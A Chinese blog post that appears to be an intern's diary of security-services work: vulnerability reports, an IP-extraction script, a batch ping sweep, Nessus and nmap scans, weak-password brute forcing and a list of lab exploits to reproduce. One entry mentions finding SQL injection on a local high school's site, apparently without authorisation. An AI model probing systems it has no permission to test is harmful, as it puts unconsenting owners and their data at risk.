<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/favicon.ico" color="#222">
  <link rel="manifest" href="/images/favicon.ico">
  <meta name="msapplication-config" content="/images/favicon.ico">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>



  <meta name="description" content="记录第一段实习">
<meta property="og:type" content="article">
<meta property="og:title" content="internship_record">
<meta property="og:url" content="http://example.com/2023/03/14/internship-record/index.html">
<meta property="og:site_name" content="realikun404">
<meta property="og:description" content="记录第一段实习">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-03-14T10:11:46.000Z">
<meta property="article:modified_time" content="2023-05-31T10:23:17.067Z">
<meta property="article:author" content="ZER0">
<meta property="article:tag" content="日常记录 安全服务实习生">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2023/03/14/internship-record/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/theme-next/theme-next-needmoreshare2@1/needsharebutton.min.css"><style>
#needsharebutton-postbottom {
  cursor: pointer;
  height: 26px;
  margin-top: 10px;
  position: relative;
}
#needsharebutton-postbottom .btn {
  border: 1px solid $btn-default-border-color;
  border-radius: 3px;
  display: initial;
  padding: 1px 4px;
}
</style>
  <title>internship_record | realikun404</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">realikun404</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">太刀は至上である.</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="archive fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/03/14/internship-record/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/cat.gif">
      <meta itemprop="name" content="ZER0">
      <meta itemprop="description" content="太刀は至上である.">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="realikun404">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          internship_record
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-03-14 18:11:46" itemprop="dateCreated datePublished" datetime="2023-03-14T18:11:46+08:00">2023-03-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-05-31 18:23:17" itemprop="dateModified" datetime="2023-05-31T18:23:17+08:00">2023-05-31</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>6.4k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>6 分钟</span>
            </span>
            <div class="post-description">记录第一段实习</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>[toc]</p>
<h1 id="安恒"><a href="#安恒" class="headerlink" title="安恒"></a>安恒</h1><h2 id="三月"><a href="#三月" class="headerlink" title="三月"></a>三月</h2><h3 id="15日"><a href="#15日" class="headerlink" title="15日"></a>15日</h3><p>summary：第一天入职 了解了请假、补假的流程，对工作稍微有了些数。对保密有了一定的了解。</p>
<table>
<thead>
<tr>
<th align="center">事情</th>
<th align="center">完成情况</th>
<th align="center">备注</th>
</tr>
</thead>
<tbody><tr>
<td align="center">url跳转漏洞验证+报告</td>
<td align="center">共写22条报告</td>
<td align="center"></td>
</tr>
</tbody></table>
<h3 id="17日"><a href="#17日" class="headerlink" title="17日"></a>17日</h3><p>进行漏洞种类的看</p>
<p>下面写下看到的漏洞及等级</p>
<p>summary：找到了两个低危，以及进行学习，处理报告</p>
<p>对漏洞进行了整理，在常见漏洞里面</p>
<h3 id="20日"><a href="#20日" class="headerlink" title="20日"></a>20日</h3><p>summary:找到二个中危（表单无限制提交、密码爆破）、二个低危（敏感信息泄露）、对内网资产进行整合共整合IP10894条</p>
<p>下面是今天写的IP资产整合的代码，代码挺丑</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pandas <span class="keyword">as</span> pd</span><br><span class="line">df = pd.read_excel(<span class="string">&#x27;1.xlsx&#x27;</span>)</span><br><span class="line"><span class="comment"># print(df.describe())</span></span><br><span class="line">columns = df.columns.values.tolist()  <span class="comment">### 获取excel 表头 ，第一行</span></span><br><span class="line"><span class="comment"># res=[]</span></span><br><span class="line">myfile = <span class="built_in">open</span>(<span class="string">&quot;res.txt&quot;</span>, <span class="string">&quot;w&quot;</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ip_identify1</span>(<span class="params">ip</span>):  <span class="comment"># 192.168.1.1</span></span><br><span class="line">    result = <span class="literal">False</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        iplist = ip.split(<span class="string">&quot;.&quot;</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(iplist) == <span class="number">4</span>:</span><br><span class="line">            check_count = <span class="number">0</span></span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> iplist:</span><br><span class="line">                <span class="keyword">if</span> <span class="keyword">not</span> (<span class="built_in">int</span>(i) &lt;= <span class="number">255</span> <span class="keyword">and</span> <span class="built_in">int</span>(i) &gt;= <span class="number">0</span>):</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    check_count += <span class="number">1</span></span><br><span class="line">            <span class="keyword">if</span> check_count == <span class="number">4</span>: result = <span class="literal">True</span>  <span class="comment"># ip</span></span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    <span class="keyword">finally</span>:</span><br><span class="line">        <span class="keyword">return</span> result</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ip_identify2</span>(<span class="params">ip</span>):  <span class="comment"># 192.168.1.2-13</span></span><br><span class="line">    result = <span class="literal">False</span></span><br><span class="line">    start = <span class="number">0</span></span><br><span class="line">    end = <span class="number">0</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        iplist = ip.split(<span class="string">&quot;.&quot;</span>)</span><br><span class="line">        checkCount = <span class="number">0</span></span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(iplist) == <span class="number">4</span>:</span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>):</span><br><span class="line">                <span class="keyword">if</span> <span class="keyword">not</span> (<span class="number">255</span> &gt;= <span class="built_in">int</span>(iplist[i]) &gt;= <span class="number">0</span>):</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    checkCount += <span class="number">1</span></span><br><span class="line">            <span class="comment"># 处理有-的</span></span><br><span class="line">            _numcount = <span class="number">0</span></span><br><span class="line">            <span class="keyword">for</span> j <span class="keyword">in</span> iplist[<span class="number">3</span>]:</span><br><span class="line">                <span class="keyword">if</span> j == <span class="string">&quot;-&quot;</span> <span class="keyword">or</span> (<span class="built_in">int</span>(j) &lt;= <span class="number">255</span> <span class="keyword">and</span> <span class="built_in">int</span>(j) &gt;= <span class="number">0</span>) :</span><br><span class="line">                    <span class="keyword">if</span> j == <span class="string">&quot;-&quot;</span>:</span><br><span class="line">                        _numcount += <span class="number">1</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">            <span class="keyword">if</span> _numcount == <span class="number">1</span>:</span><br><span class="line">                _index = iplist[<span class="number">3</span>].find(<span class="string">&#x27;-&#x27;</span>)</span><br><span class="line">                start = iplist[<span class="number">3</span>][:_index]</span><br><span class="line">                end = iplist[<span class="number">3</span>][_index + <span class="number">1</span>:]</span><br><span class="line">                checkCount += <span class="number">1</span></span><br><span class="line">        <span class="keyword">if</span> checkCount == <span class="number">4</span>:</span><br><span class="line">            <span class="keyword">if</span> start&gt;end:</span><br><span class="line">                temp=end</span><br><span class="line">                end=start</span><br><span class="line">                start=temp</span><br><span class="line">            <span class="keyword">return</span> iplist[<span class="number">0</span>] + <span class="string">&quot;.&quot;</span> + iplist[<span class="number">1</span>] + <span class="string">&quot;.&quot;</span> + iplist[<span class="number">2</span>] + <span class="string">&quot;.&quot;</span>, start, end</span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"><span class="keyword">for</span> idx, row <span class="keyword">in</span> df.iterrows():  <span class="comment">### 迭代数据 以键值对的形式 获取 每行的数据</span></span><br><span class="line">    <span class="keyword">for</span> column <span class="keyword">in</span> columns:</span><br><span class="line">        <span class="comment"># print(row[column])</span></span><br><span class="line">        curstr = row[column]</span><br><span class="line">        <span class="keyword">if</span> pd.isna(curstr):</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            strlen = <span class="built_in">len</span>(curstr)</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        i = <span class="number">0</span></span><br><span class="line">        j = <span class="number">7</span></span><br><span class="line">        <span class="keyword">if</span> j &gt; strlen:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>, strlen + <span class="number">1</span>):</span><br><span class="line">            <span class="comment"># print(res)</span></span><br><span class="line">            <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, j):</span><br><span class="line">                tempstr = curstr[i:j]</span><br><span class="line">                <span class="comment"># 分成两种进行判断要么是类型一要么是类型二</span></span><br><span class="line">                <span class="keyword">if</span> ip_identify1(tempstr):</span><br><span class="line">                    <span class="keyword">if</span> <span class="built_in">str</span>.isdigit(curstr[j - <span class="number">1</span>]):</span><br><span class="line">                        <span class="keyword">if</span> (j != strlen <span class="keyword">and</span> <span class="keyword">not</span> <span class="built_in">str</span>.isdigit(curstr[j])) <span class="keyword">or</span> j == strlen:<span class="comment">#j后面不能有数字，i前面也不能有数字</span></span><br><span class="line">                            <span class="keyword">if</span> i&gt;<span class="number">0</span> <span class="keyword">and</span> <span class="built_in">str</span>.isdigit(curstr[i-<span class="number">1</span>]):</span><br><span class="line">                                <span class="keyword">continue</span></span><br><span class="line">                            <span class="keyword">if</span> (ip_identify1(tempstr)):</span><br><span class="line">                                <span class="comment"># res.append(tempstr)</span></span><br><span class="line">                                myfile.write(tempstr + <span class="string">&quot;\n&quot;</span>)</span><br><span class="line">                            ipres = ip_identify2(tempstr)</span><br><span class="line">                            <span class="keyword">if</span> (ipres):</span><br><span class="line">                                <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">int</span>(ipres[<span class="number">1</span>]), <span class="built_in">int</span>(ipres[<span class="number">2</span>]) + <span class="number">1</span>):</span><br><span class="line">                                    <span class="keyword">try</span>:</span><br><span class="line">                                        myfile.write(tempstr + <span class="string">&quot;\n&quot;</span>)</span><br><span class="line">                                        <span class="comment"># res.append(ipres[0] + str(k))</span></span><br><span class="line">                                    <span class="keyword">except</span>:</span><br><span class="line">                                        <span class="keyword">pass</span></span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    ipres = ip_identify2(tempstr)</span><br><span class="line">                    <span class="keyword">if</span> j&lt;strlen-<span class="number">1</span> <span class="keyword">and</span> <span class="built_in">str</span>.isdigit(curstr[j]):  <span class="comment"># j后面不能有数字，i前面也不能有数字</span></span><br><span class="line">                            <span class="keyword">continue</span></span><br><span class="line">                    <span class="keyword">if</span> i &gt; <span class="number">0</span> <span class="keyword">and</span> <span class="built_in">str</span>.isdigit(curstr[i - <span class="number">1</span>]):</span><br><span class="line">                        <span class="keyword">continue</span></span><br><span class="line">                    <span class="keyword">if</span> (ipres):</span><br><span class="line">                        <span class="keyword">try</span>:</span><br><span class="line">                            <span class="keyword">for</span> k <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">int</span>(ipres[<span class="number">1</span>]), <span class="built_in">int</span>(ipres[<span class="number">2</span>]) + <span class="number">1</span>):</span><br><span class="line">                                <span class="keyword">try</span>:</span><br><span class="line">                                    myfile.write(ipres[<span class="number">0</span>]+<span class="built_in">str</span>(k) + <span class="string">&quot;\n&quot;</span>)</span><br><span class="line">                                    <span class="comment"># res.append(ipres[0] + str(k))</span></span><br><span class="line">                                <span class="keyword">except</span>:</span><br><span class="line">                                    <span class="keyword">pass</span></span><br><span class="line">                        <span class="keyword">except</span>:</span><br><span class="line">                            <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>

<p>更新：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pandas <span class="keyword">as</span> pd</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">df = pd.read_excel(<span class="string">&#x27;1.xlsx&#x27;</span>)</span><br><span class="line"></span><br><span class="line">columns = df.columns.values.tolist()  <span class="comment">### 获取excel 表头 ，第一行</span></span><br><span class="line"><span class="comment"># res=[]</span></span><br><span class="line">myfile = <span class="built_in">open</span>(<span class="string">&quot;test.txt&quot;</span>, <span class="string">&quot;w&quot;</span>)</span><br><span class="line"></span><br><span class="line">patter1 = re.<span class="built_in">compile</span>(<span class="string">r&#x27;(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[&#x27;</span></span><br><span class="line">                     <span class="string">r&#x27;1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[&#x27;</span></span><br><span class="line">                     <span class="string">r&#x27;0-1]\d&#123;2&#125;|[1-9]?\d)&#x27;</span>)</span><br><span class="line">patter2 = re.<span class="built_in">compile</span>(<span class="string">r&#x27;(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[&#x27;</span></span><br><span class="line">                     <span class="string">r&#x27;1-9]?\d)\.(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)\.(25[0-5]|2[0-4]\d|[&#x27;</span></span><br><span class="line">                     <span class="string">r&#x27;0-1]\d&#123;2&#125;|[1-9]?\d-25[0-5]|2[0-4]\d|[&#x27;</span></span><br><span class="line">                     <span class="string">r&#x27;0-1]\d&#123;2&#125;|[1-9]?\d)-(25[0-5]|2[0-4]\d|[0-1]\d&#123;2&#125;|[1-9]?\d)&#x27;</span>)</span><br><span class="line"><span class="keyword">for</span> idx, row <span class="keyword">in</span> df.iterrows():  <span class="comment">### 迭代数据 以键值对的形式 获取 每行的数据</span></span><br><span class="line">    <span class="keyword">for</span> column <span class="keyword">in</span> columns:</span><br><span class="line">        curstr = row[column]</span><br><span class="line">        <span class="keyword">if</span> pd.isna(curstr):</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            strlen = <span class="built_in">len</span>(curstr)</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        res1 = re.findall(patter1, <span class="built_in">str</span>(curstr))</span><br><span class="line">        res2 = re.findall(patter2, <span class="built_in">str</span>(curstr))</span><br><span class="line">        <span class="keyword">if</span> res1:</span><br><span class="line">            <span class="built_in">print</span>(res1)</span><br><span class="line">        <span class="keyword">if</span> res2:</span><br><span class="line">            <span class="built_in">print</span>(res2)</span><br></pre></td></tr></table></figure>



<h4 id="公众号漏洞"><a href="#公众号漏洞" class="headerlink" title="公众号漏洞"></a>公众号漏洞</h4><table>
<thead>
<tr>
<th align="center">漏洞名称</th>
<th align="center">等级</th>
<th align="center">备注</th>
</tr>
</thead>
<tbody><tr>
<td align="center">批量提交漏洞</td>
<td align="center">低</td>
<td align="center">可批量提交表单消耗服务器资源</td>
</tr>
<tr>
<td align="center">短信接口滥用</td>
<td align="center">中</td>
<td align="center">任意手机号一小时发五次也算</td>
</tr>
<tr>
<td align="center">敏感信息泄露</td>
<td align="center">低</td>
<td align="center"></td>
</tr>
<tr>
<td align="center">短信验证码绕过</td>
<td align="center">中</td>
<td align="center">修改返回包</td>
</tr>
</tbody></table>
<h3 id="20日："><a href="#20日：" class="headerlink" title="20日："></a>20日：</h3><p>漏洞挖掘，挖到一个中危短信滥用、三个低危敏感信息泄露。</p>
<p>学了点java安全知识。</p>
<h3 id="22日："><a href="#22日：" class="headerlink" title="22日："></a>22日：</h3><p>忘了记了。</p>
<h3 id="24日："><a href="#24日：" class="headerlink" title="24日："></a>24日：</h3><p>还是日常挖洞。一中危（爆破）、二低危</p>
<h3 id="27日："><a href="#27日：" class="headerlink" title="27日："></a>27日：</h3><p>上午找网站洞，下午去客服那里驻场实施、渗透测试、基线检测</p>
<p><strong>堡垒机</strong>：堡垒机，即在一个特定的网络环境下，为了保障网络和数据不受来自外部和内部用户的入侵和破坏，而运用各种技术手段监控和记录运维人员对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为，以便集中报警、及时处理及审计定责。</p>
<p>用一句话来说，堡垒机就是用来后控制哪些人可以登录哪些资产（事先防范和事中控制），以及录像记录登录资产后做了什么事情（事溯源）</p>
<p>堡垒机很多时候也叫运维审计系统，它的核心是可控及审计。可控是指权限可控、行为可控。<strong>权限可控</strong>，比如某个工程师要离职或要转岗了。如果没有一个统一的权限管理入口，是一场梦魇。<strong>行为可控</strong>，比如我们需要集中禁用某个危险命令，如果没有一个统一入口，操作的难度可想而知。</p>
<p><strong>跳板机</strong>：跳板机其实就是一台unix&#x2F;windows操作系统的服务器，所有运维人员都需要先远程登录跳板机，然后再从跳板机登录其他服务器中进行运维操作。</p>
<p>但跳板机并没有实现对运维人员操作行为的控制和审计，使用跳板机过程中还是会有误操作、违规操作导致的操作事故，一旦出现操作事故很难快速定位原因和责任人。此外，跳板机存在严重的安全风险，一旦跳板机系统被攻入，则将后端资源风险完全暴露无遗。同时，对于个别资源（如telnet）可以通过跳板机来完成一定的内控，但是对于更多更特殊的资源（ftp、rdp等）来讲就显得力不从心了。</p>
<p>今天对内网进行基线检测和渗透测试：</p>
<p>先是登录到堡垒机</p>
<p>上传nussues、xshell、xftp</p>
<p>然后扫描内网存活主机：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">@<span class="built_in">echo</span> off</span><br><span class="line">chcp 65001&gt;nul</span><br><span class="line"><span class="built_in">echo</span> 正在扫描。。。。。。</span><br><span class="line"><span class="keyword">for</span> /L %%P <span class="keyword">in</span> (1,1,254) <span class="keyword">do</span> @ping -w 10 -n 1 192.168.1.%%P | findstr TTL= &gt;&gt;C:\ping.txt</span><br><span class="line"><span class="built_in">echo</span> 扫描结束，按任意键结束窗口！</span><br><span class="line">pause&gt;nul</span><br></pre></td></tr></table></figure>

<p>然后使用nmap windows版本扫描端口看哪个开了ftp</p>
<p>然后build nussues，批量扫描</p>
<p>当时想要某个内网IP的账号密码，后面说把脚本给运维就行，也就没管了</p>
<p>然后对内网段进行弱密码爆破</p>
<h3 id="29日"><a href="#29日" class="headerlink" title="29日"></a>29日</h3><p>学了小程序的测试已经小程序的源代码怎么解密，怎么导入到开发者工具进行调试等。</p>
<p>协助进行漏洞复测、找到一条低危漏洞（敏感信息泄露）。</p>
<p><del>还想摸鱼学会java漏洞的，没摸成，</del>看小程序漏洞去了。</p>
<h3 id="31日"><a href="#31日" class="headerlink" title="31日"></a>31日</h3><p>仔细看了下逻辑漏洞种类，对网页进行测试，找到一个中危暴力破解，一个低危敏感信息泄露，以及本地搭建flask服务器，前端调用ajax获取待加密字符，然后加密，发回来。</p>
<h2 id="四月"><a href="#四月" class="headerlink" title="四月"></a>四月</h2><h3 id="03日"><a href="#03日" class="headerlink" title="03日"></a>03日</h3><p>进行资产收集和漏洞扫描。</p>
<p>使用的公司工具以及github工具进行收集。</p>
<p>子域名：layer+oneforall</p>
<p>公众号：公司工具+搜狗</p>
<p>Email：公司工具、github工具</p>
<p>还有写百度文库类似的</p>
<h3 id="07日"><a href="#07日" class="headerlink" title="07日"></a>07日</h3><p>学习公司的漏扫机怎样用，对软研院进行测试。<del>以及下周一就得一个人到客户那了，有点烦</del></p>
<p>今天开下sqlmap源码学习。</p>
<p><a target="_blank" rel="noopener" href="https://github.com/ZororoZ/fscanOutput">https://github.com/ZororoZ/fscanOutput</a></p>
<p>fscan使用</p>
<h3 id="10日"><a href="#10日" class="headerlink" title="10日"></a>10日</h3><p>学会了landon的使用，发现自己的市里某所高中有sql注入，看到database就不敢看了，怕出事。</p>
<p>上午进行软研院测试以及语雀对应的敏感信息收集，因为语雀翻页频率太高被封了一会（之后借了别人的号</p>
<p>下午去fw进行漏扫及基线检测。</p>
<h3 id="12日"><a href="#12日" class="headerlink" title="12日"></a>12日</h3><p>一天都去进行基线和漏扫了。但是下班比较早</p>
<h3 id="14日"><a href="#14日" class="headerlink" title="14日"></a>14日</h3><p>最后一天，挖了软研院得洞，帮助复测写报告等。</p>
<h1 id="安芯网盾"><a href="#安芯网盾" class="headerlink" title="安芯网盾"></a>安芯网盾</h1><h2 id="环境复现想法"><a href="#环境复现想法" class="headerlink" title="环境复现想法"></a>环境复现想法</h2><table>
<thead>
<tr>
<th align="center">类型</th>
<th align="center">是否复现</th>
<th align="center">顺序</th>
</tr>
</thead>
<tbody><tr>
<td align="center">upload-lab</td>
<td align="center">1</td>
<td align="center">1</td>
</tr>
<tr>
<td align="center">sql注入</td>
<td align="center"></td>
<td align="center">3</td>
</tr>
<tr>
<td align="center">栈溢出</td>
<td align="center"></td>
<td align="center">2</td>
</tr>
<tr>
<td align="center">格式化字符串漏洞泄露canary</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">xss</td>
<td align="center"></td>
<td align="center">4</td>
</tr>
<tr>
<td align="center">Tomcat_AJP任意文件读取漏洞</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">URLDNS</td>
<td align="center"></td>
<td align="center">5</td>
</tr>
<tr>
<td align="center">CC1</td>
<td align="center"></td>
<td align="center">6</td>
</tr>
<tr>
<td align="center">CC6</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">CC3</td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center">CC2+CC4+CC5+CC7</td>
<td align="center"></td>
